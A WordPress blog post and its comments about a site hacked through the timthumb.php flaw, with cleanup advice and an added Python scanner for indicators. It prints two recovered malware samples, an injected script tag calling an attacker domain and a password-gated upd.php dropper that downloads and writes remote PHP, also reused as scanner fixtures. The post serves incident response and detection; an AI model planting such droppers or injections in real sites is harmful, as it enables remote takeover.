    WordPress sites using Timthumb.php is Prone to Hacking [Almost Every Themes]

    By Harsh Agrawal in WordPress

    Today one of my clients pinged me and told me that he was unable to log in to his wp-admin. His wp-admin was giving the error mentioned below:

    “warning: Cannot modify header information – headers already sent by (output started at /home/stony/public_html/wp-settings.php:748) in /home/stony/public_html/wp-includes/pluggable.php on line 868”

    When I logged into the client's site via FTP, I saw that some files had been modified and some weird PHP files had been added. The first piece of suspicious code was found in index.php at the root of the WordPress installation, which contained:

```php
<?php
// Injected tracker: loads a script from the attacker's domain on every page
// view and leaks the visitor's Referer header to it.
echo '<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref=' . urlencode($_SERVER['HTTP_REFERER']) . '"></script>';
?>
```

    Then, in the plugins folder, there was a file called upd.php with the following code:

```php
<?php
// Dropper: when the pass parameter equals a hard-coded string, it fetches the
// URL given in the file parameter and writes it to a randomly named .php file.
$file = $_GET['file'];
$pass = $_GET['pass'];
$true = '1c383cd30b7c298ab50293adfecb7b18';
if ($pass == $true) {
    $ch = curl_init($file);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $shell = curl_exec($ch);
    curl_close($ch);

    // md5(rand()) gives a 32-hex-character file name, e.g. 4d2f...e1.php
    $tmp = md5(rand(0, 10000));

    $f = fopen($tmp . '.php', "w");
    fputs($f, $shell);
    fclose($f);
}
```

    Well, that's not all: many other files were infected too. The cause of this hack is remote code injection through a vulnerability in timthumb.php.

    What is Timthumb.php?

    Timthumb.php is one of the most popular scripts for auto-generating thumbnails, and it is used by almost all of the popular premium WordPress theme clubs, which is why so many sites are being infected by this hack. The vulnerability in the timthumb.php script allows an attacker to upload arbitrary PHP code into timthumb's cache directory and execute it. Once the attacker executes that PHP file, he has almost complete control of your site and can do anything with it. In most cases you will see your site being redirected, or ads and popups appearing on it. In my client's case, wp-admin was inaccessible.

    So what is the solution to this timthumb.php hack?

    The very first thing you should do is scan your blog, or ask your hosting company to run a scan. Delete all unused themes and plugins. Update all plugins and themes to their latest versions. If you are using a free and outdated theme, switch to a premium WordPress theme or to a free theme that receives constant updates. My recommendation is to grab the Thesis theme, which is well supported by the community and constantly updated. You can manually reinstall WordPress, update your theme and, most importantly, update the timthumb.php file. The author of this script has already released an updated version, which you can grab from here. Once done, recheck all files for any trace of hacked code. You can use a WordPress security plugin to see whether any traces of hacked files remain.
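As an added example (not code from the original post or from the timthumb project), the Python script below implements the "recheck all files" step: it walks a WordPress tree and flags the indicators this post and its comments describe, namely the injected remote-script tag, the upd.php downloader pattern, 32-hex-character .php names as written by that dropper, PHP files sitting inside a timthumb cache directory, and a timthumb.php older than 1.35. It assumes timthumb.php declares its version as define('VERSION', ...), and the sample site tree is constructed for the demo.

```python
import os
import re
import tempfile

# Indicators from the post: the remote-script echo in index.php, the curl downloader upd.php,
# the md5-named .php files it writes, timthumb.php below 1.35, .php files in a timthumb cache dir.
INJECTED_SCRIPT = re.compile(r'<script[^>]+src=["\']https?://superpuperdomain\.com/count\.php', re.I)
DOWNLOADER = re.compile(r'\$_GET\[[\'"]file[\'"]\].*curl_init\(', re.S)
HEX_NAME = re.compile(r'^[0-9a-f]{32}\.php$', re.I)
# Assumption: timthumb.php declares its version as define('VERSION', 'x.yz').
TIMTHUMB_VERSION = re.compile(r'define\s*\(\s*[\'"]VERSION[\'"]\s*,\s*[\'"]([\d.]+)[\'"]')
FIXED_VERSION = (1, 35)


def scan(root):
    """Walk a WordPress tree; return sorted (relative path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in (n for n in files if n.lower().endswith('.php')):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, '/')
            if HEX_NAME.match(name):
                findings.append((rel, 'md5-style random filename, as written by upd.php'))
            if os.path.basename(dirpath) == 'cache':
                findings.append((rel, 'PHP file inside a timthumb cache directory'))
            with open(path, 'r', errors='replace') as f:
                text = f.read()
            if INJECTED_SCRIPT.search(text):
                findings.append((rel, 'injected remote <script> tag leaking HTTP_REFERER'))
            if DOWNLOADER.search(text):
                findings.append((rel, 'GET-driven curl downloader (upd.php pattern)'))
            if name.lower() == 'timthumb.php':
                m = TIMTHUMB_VERSION.search(text)
                if m and tuple(int(p) for p in m.group(1).split('.')) < FIXED_VERSION:
                    findings.append((rel, 'timthumb.php %s is older than 1.35' % m.group(1)))
    return sorted(findings)


def build_sample_site():  # constructed sample tree for the demo, not a real site
    root = tempfile.mkdtemp()
    files = {
        'index.php': "<?php echo'<script language=\"javascript\" SRC=\"http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']).'\"></script>'; ?>",
        'wp-content/plugins/upd.php': "<?php $file = $_GET['file']; $ch = curl_init($file); ?>",
        'wp-content/themes/t/scripts/timthumb.php': "<?php define ('VERSION', '1.33'); ?>",
        'wp-content/themes/t/scripts/cache/d41d8cd98f00b204e9800998ecf8427e.php': '<?php ?>',
        'wp-content/themes/t/functions.php': '<?php add_theme_support("menus"); ?>',  # clean control
    }
    for rel, body in files.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), 'w') as f:
            f.write(body)
    return root
```

Point scan() at a real install's document root; each finding is a path plus the reason it was flagged, and a clean theme file such as functions.php produces nothing.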

    Even if you have not been hacked, or you are using an old version of a theme, I would suggest you update your theme to the latest version or at least update your timthumb.php. Always remember, prevention is better than cure.

    If you are not technically sound and not familiar with FTP and fixing this issue, you can get in touch via our WordPress services page and let our team fix your site.

    Article by

    Harsh has written 1264 articles.

    20 comments

    Vivek Parmar

    That’s sad to hear that one of your clients became the victim. That’s the reason why I use premium themes like Thesis and other popular frameworks :)

    Harsh Agrawal

    @Vivek My client is just an example; it could be anyone who is using an outdated timthumb.php script or an outdated WordPress theme. Even many premium theme clubs have updated their themes with the updated timthumb.php script. So the quick suggestion is: update your timthumb script, or if your theme club has rolled out an update, update your theme.

    bhushan

    omg.. but while I update my theme it seems all plugins are damaged and all widgets are useless.. any solution or other way to update without any problem?

    Harsh Agrawal

    @Bhushan
    What theme are you using? If you update the theme, I believe you won’t miss out on the widgets. Or if you wanna be fail-safe, simply drag and drop your widgets to the inactive widgets tab, install the new theme and put the widgets back.

    bhushan

    Thanks Harsh for the reply. I am using the Mystique theme… but whenever I update my theme I lose my plugins :(

    Manendra

    Harsh, I am using the Thesis theme. Can I update this timthumb.php code which you provided..?? It is in this root directory: “thesis_18/lib/scripts/thumb.php”

    rakesh kumar

    Thanks a lot for this update. I have my own developed WordPress theme on my website and I have overall control of that theme, so at last my hard work is now paying off for me. At least I don't have to worry about this security hole.

    Fahad

    Thanks a lot Harsh. Well, my theme was also using the timthumb.php file and it was outdated; your post helped in securing my blog. Hurrah, updated to the latest version.

    Prem Pandit

    Thanks for the update. Do not give hackers the chance to destroy your blog.

    Harsh Agrawal

    @Manendra It should be named timthumb.php, and yes, the location is right. You can upgrade it directly by downloading the latest version from here:
    http://timthumb.googlecode.com/svn/trunk/timthumb.php

    Harsh Agrawal

    @Rakesh That’s nice that you're using your own theme, and I hope you're not using any plugin to generate thumbnails or anything like that. If you are, update those plugins..

    @Prem @Fahad
    Glad I could help..Thanks for your comment.. :)

    Manendra

    Thank you Harsh, I will update this now. And thank you for informing me about this issue.

    Amy

    As far as I know, the Timthumb code in Thesis (lib/scripts) is not the same as the one available at googlecode (old Timthumb version). So is it okay to just copy it like that?

    Of course the new version of Timthumb (googlecode) has new security measures added.

    Is your client using Thesis, or did he use Timthumb from googlecode (old version)?

    Shariq

    Thanks to Woo Themes. They mailed all their customers and notified them about the security risk. They instantly updated their framework, including timthumb. Users can easily update the framework via their theme options panel.

    Saugat Adhikari

    I have the same issue. I just logged into the WordPress directory with wp-login.php and reinstalled the update from the admin page. It works for me. :)

    Siddharth

    Not sure about it, but people often use brute force attacks to hack into WP.. a few of my friends suffered as well.. Restricting the “wp-admin” folder to particular IPs might solve such admin problems, I guess.

    Vijay

    Hi Harsh,
    Thanks for the info. File versions above 1.09 and below 1.35 are vulnerable to security attacks. I have updated the necessary files to the latest version.

    One question:
    There is one file named “timthumb.php.svn-base” having only 4 lines in it. Is it insecure to keep as is, or does it need to be updated? And what info does it have?

    Thanks
    Vijay

    Suhanesh Madav

    Thanks Harsh for the info. Will check whether my theme got the updated code or not.

    Sahil Kotak

    Yeah, I have found such vulnerable files in WordPress many times. They are mostly some numbers.php (4347623.php or something like that).

    Peter

    I also have had a number of clients get hit with this hack. Not everybody is comfortable with the process of finding and upgrading the timthumb script in their themes or plugins (some plugins use this script too!). I put together this plugin yesterday to help:
    http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/
